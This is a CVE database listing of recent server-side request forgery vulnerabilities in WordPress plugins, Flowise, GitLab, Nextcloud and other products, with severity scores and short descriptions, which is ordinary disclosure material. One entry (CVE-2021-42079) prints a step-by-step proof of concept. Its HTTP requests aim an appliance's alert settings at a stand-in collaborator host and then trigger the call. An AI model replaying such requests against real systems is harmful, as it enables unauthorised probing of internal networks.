Total
1821 CVE
| CVE | Vendors | Products | Updated | CVSS v3.1 |
|---|---|---|---|---|
| CVE-2025-53457 | 1 Wordpress | 1 Wordpress | 2025-09-23 | 4.4 Medium |
| Server-Side Request Forgery (SSRF) vulnerability in activewebsight SEO Backlink Monitor allows Server Side Request Forgery. This issue affects SEO Backlink Monitor: from n/a through 1.6.0. | ||||
| CVE-2025-58011 | 1 Wordpress | 1 Wordpress | 2025-09-23 | 6.4 Medium |
| Server-Side Request Forgery (SSRF) vulnerability in Alex Content Mask allows Server Side Request Forgery. This issue affects Content Mask: from n/a through 1.8.5.2. | ||||
| CVE-2025-58962 | 1 Wordpress | 1 Wordpress | 2025-09-23 | 6.4 Medium |
| Server-Side Request Forgery (SSRF) vulnerability in publitio Publitio allows Server Side Request Forgery. This issue affects Publitio: from n/a through 2.2.1. | ||||
| CVE-2025-59527 | 1 Flowiseai | 1 Flowise | 2025-09-23 | 7.5 High |
| Flowise is a drag & drop user interface to build a customized large language model flow. In version 3.0.5, a Server-Side Request Forgery (SSRF) vulnerability was discovered in the /api/v1/fetch-links endpoint of the Flowise application. This vulnerability allows an attacker to use the Flowise server as a proxy to access internal network web services and explore their link structures. This issue has been patched in version 3.0.6. | ||||
| CVE-2025-10787 | 1 Muyucms | 1 Muyucms | 2025-09-23 | 6.3 Medium |
| A vulnerability was found in MuYuCMS up to 2.7. Impacted is an unknown function of the file /index/index.html of the component Add Fiend Link Handler. Performing manipulation of the argument Link URL results in server-side request forgery. The attack may be initiated remotely. The exploit has been made public and could be used. | ||||
| CVE-2025-58005 | 1 Wordpress | 1 Wordpress | 2025-09-23 | 5.4 Medium |
| Server-Side Request Forgery (SSRF) vulnerability in SmartDataSoft DriCub allows Server Side Request Forgery. This issue affects DriCub: from n/a through 2.9. | ||||
| CVE-2025-57984 | 2 Makestories, Wordpress | 2 Makestories (for Google Web Stories), Wordpress | 2025-09-23 | 4.4 Medium |
| Server-Side Request Forgery (SSRF) vulnerability in Pratik Ghela MakeStories (for Google Web Stories) allows Server Side Request Forgery. This issue affects MakeStories (for Google Web Stories): from n/a through 3.0.4. | ||||
| CVE-2025-57055 | 1 Wondercms | 1 Wondercms | 2025-09-23 | 6.5 Medium |
| WonderCMS 3.5.0 is vulnerable to Server-Side Request Forgery (SSRF) in the custom module installation functionality. An authenticated administrator can supply a malicious URL via the pluginThemeUrl POST parameter. The server fetches the provided URL using curl_exec() without sufficient validation, allowing the attacker to force internal or external HTTP requests. | ||||
| CVE-2025-26515 | 1 Netapp | 1 Storagegrid | 2025-09-23 | 7.5 High |
| StorageGRID (formerly StorageGRID Webscale) versions prior to 11.8.0.15 and 11.9.0.8 without Single Sign-on enabled are susceptible to a Server-Side Request Forgery (SSRF) vulnerability. Successful exploit could allow an unauthenticated attacker to change the password of any Grid Manager or Tenant Manager non-federated user. | ||||
| CVE-2024-32965 | 1 Lobehub | 1 Lobe Chat | 2025-09-23 | 8.1 High |
| Lobe Chat is an open-source, AI chat framework. Versions of lobe-chat prior to 1.19.13 have an unauthorized ssrf vulnerability. An attacker can construct malicious requests to cause SSRF without logging in, attack intranet services, and leak sensitive information. The jwt token header X-Lobe-Chat-Auth strored proxy address and OpenAI API Key, can be modified to scan an internal network in the target lobe-web environment. This issue has been addressed in release version 1.19.13 and all users are advised to upgrade. There are no known workarounds for this vulnerability. | ||||
| CVE-2025-59344 | 1 Aliasvault | 1 Aliasvault | 2025-09-22 | 7.7 High |
| AliasVault is a privacy-first password manager with built-in email aliasing. A server-side request forgery (SSRF) vulnerability exists in the favicon extraction feature of AliasVault API versions 0.23.0 and lower. The extractor fetches a user-supplied URL, parses the returned HTML, and follows <link rel="icon" href="…">. Although the initial URL is validated to allow only HTTP/HTTPS with default ports, the extractor automatically follows redirects and does not block requests to loopback or internal IP ranges. An authenticated, low-privileged user can exploit this behavior to coerce the backend into making HTTP(S) requests to arbitrary internal hosts and non-default ports. If the target host serves a favicon or any other valid image, the response is returned to the attacker in Base64 form. Even when no data is returned, timing and error behavior can be abused to map internal services. This vulnerability only affects self-hosted AliasVault instances that are reachable from the public internet with public user registration enabled. Private/internal deployments without public sign-ups are not directly exploitable. This issue has been fixed in AliasVault release 0.23.1. | ||||
| CVE-2025-10760 | 1 Harness | 1 Harness | 2025-09-22 | 6.3 Medium |
| A flaw has been found in Harness 3.3.0. This impacts the function LookupRepo of the file app/api/controller/gitspace/lookup_repo.go. Executing manipulation of the argument url can lead to server-side request forgery. The attack may be launched remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | ||||
| CVE-2025-27152 | 1 Axios | 1 Axios | 2025-09-22 | 7.5 High |
| axios is a promise based HTTP client for the browser and node.js. The issue occurs when passing absolute URLs rather than protocol-relative URLs to axios. Even if baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios. This issue is fixed in 1.8.2. | ||||
| CVE-2021-42079 | 1 Osnexus | 1 Quantastor | 2025-09-22 | 6.2 Medium |
| An authenticated administrator is able to prepare an alert that is able to execute an SSRF attack. This is exclusively with POST requests. POC Step 1: Prepare the SSRF with a request like this: GET /qstorapi/alertConfigSet?senderEmailAddress=a&smtpServerIpAddress=BURPCOLLABHOST&smtpServerPort=25&smtpUsername=a&smtpPassword=1&smtpAuthType=1&customerSupportEmailAddress=1&poolFreeSpaceWarningThreshold=1&poolFreeSpaceAlertThreshold=1&poolFreeSpaceCriticalAlertThreshold=1&pagerDutyServiceKey=1&slackWebhookUrl=http://<target>&enableAlertTypes&enableAlertTypes=1&disableAlertTypes=1&pauseAlertTypes=1&mattermostWebhookUrl=http://<TARGET> HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 0 Step 2: Trigger this alert with this request GET /qstorapi/alertRaise?title=test&message=test&severity=1 HTTP/1.1 Host: <HOSTNAME> Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Connection: close authorization: Basic <BASIC_AUTH_HASH> Content-Type: application/json Content-Length: 1 The post request received by <TARGET> looks like this: { ### Python FLASK stuff #### 'endpoint': 'index', 'method': 'POST', 'cookies': ImmutableMultiDict([]), ### END Python FLASK stuff #### 'data': b'{ "attachments": [ { "fallback": "[122] test / test.", "color": "#aa2222", "title": "[122] test", "text": "test", "fields": [ { "title": "Alert Severity", "value": "CRITICAL", "short": false }, { "title": "Appliance", "value": "quantastor (https://<HOSTNAME>)", "short": true }, { "title": "System / Driver / Kernel Ver", "value": "5.10.0.156+a25eaacef / scst-3.5.0-pre / 5.3.0-62-generic", "short": false }, { "title": "System Startup", "value": "Fri Aug 6 16-02-55 2021", "short": true }, { "title": "SSID", "value": "f4823762-1dd1-1333-47a0-6238c474a7e7", "short": true }, ], "footer": "QuantaStor Call-home Alert", "footer_icon": " https://platform.slack-edge.com/img/default_application_icon.png ", "ts": 1628461774 } ], "mrkdwn":true }', #### FLASK REQUEST STUFF ##### 'headers': { 'Host': '<redacted>', 'User-Agent': 'curl/7.58.0', 'Accept': '*/*', 'Content-Type': 'application/json', 'Content-Length': '790' }, 'args': ImmutableMultiDict([]), 'form': ImmutableMultiDict([]), 'remote_addr': '217.103.63.173', 'path': '/payload/58', 'whois_ip': 'TNF-AS, NL' } #### END FLASK REQUEST STUFF ##### | ||||
| CVE-2024-38645 | 1 Qnap | 1 Notes Station 3 | 2025-09-20 | 6.5 Medium |
| A server-side request forgery (SSRF) vulnerability has been reported to affect Notes Station 3. If exploited, the vulnerability could allow remote authenticated attackers to read application data. We have already fixed the vulnerability in the following version: Notes Station 3 3.9.7 and later | ||||
| CVE-2025-6454 | 1 Gitlab | 1 Gitlab | 2025-09-20 | 8.5 High |
| An issue has been discovered in GitLab CE/EE affecting all versions from 16.11 before 18.1.6, 18.2 before 18.2.6, and 18.3 before 18.3.2 that could have allowed authenticated users to make unintended internal requests through proxy environments by injecting crafted sequences. | ||||
| CVE-2025-58045 | 1 Dataease | 1 Dataease | 2025-09-19 | 9.8 Critical |
| Dataease is an open source data analytics and visualization platform. In Dataease versions up to 2.10.12, the patch introduced to mitigate DB2 JDBC deserialization remote code execution attacks only blacklisted the rmi parameter. The ldap parameter in the DB2 JDBC connection string was not filtered, allowing attackers to exploit the DB2 JDBC connection string to trigger server-side request forgery (SSRF). In higher versions of Java, ldap deserialization (autoDeserialize) is disabled by default, preventing remote code execution, but SSRF remains exploitable. Versions up to 2.10.12 are affected. The issue is fixed in version 2.10.13. Updating to 2.10.13 or later is recommended. No known workarounds are documented aside from upgrading. | ||||
| CVE-2025-47791 | 1 Nextcloud | 1 Nextcloud Server | 2025-09-19 | 4.3 Medium |
| Nextcloud Server is a self hosted personal cloud system. In Nextcloud Server prior to 28.0.13, 29.0.10, and 30.0.3 and Nextcloud Enterprise Server prior to 28.0.13, 29.0.10, and 30.0.3, a currently unused endpoint to verify a share recipient was not protected correctly, allowing to proxy requests to another server. The endpoint was removed in Nextcloud Server 28.0.13, 29.0.10, and 30.0.3 and Nextcloud Enterprise Server 28.0.13, 29.0.10, and 30.0.3. No known workarounds are available. | ||||
| CVE-2021-28627 | 1 Adobe | 1 Experience Manager | 2025-09-19 | 5.4 Medium |
| Adobe Experience Manager Cloud Service offering, as well as versions 6.5.8.0 (and below) is affected by a Server-side Request Forgery. An authenticated attacker could leverage this vulnerability to contact systems blocked by the dispatcher. Exploitation of this issue does not require user interaction. | ||||
| CVE-2025-59346 | 2 Dragonflyoss, Linuxfoundation | 2 Dragonfly2, Dragonfly | 2025-09-18 | 5.3 Medium |
| Dragonfly is an open source P2P-based file distribution and image acceleration system. Versions prior to 2.1.0 contain a server-side request forgery (SSRF) vulnerability that enables users to force DragonFly2’s components to make requests to internal services that are otherwise not accessible to them. The issue arises because the Manager API accepts a user-supplied URL when creating a Preheat job with weak validation, peers can trigger other peers to fetch an arbitrary URL through pieceManager.DownloadSource, and internal HTTP clients follow redirects, allowing a request to a malicious server to be redirected to internal services. This can be used to probe or access internal HTTP endpoints. The vulnerability is fixed in version 2.1.0. | ||||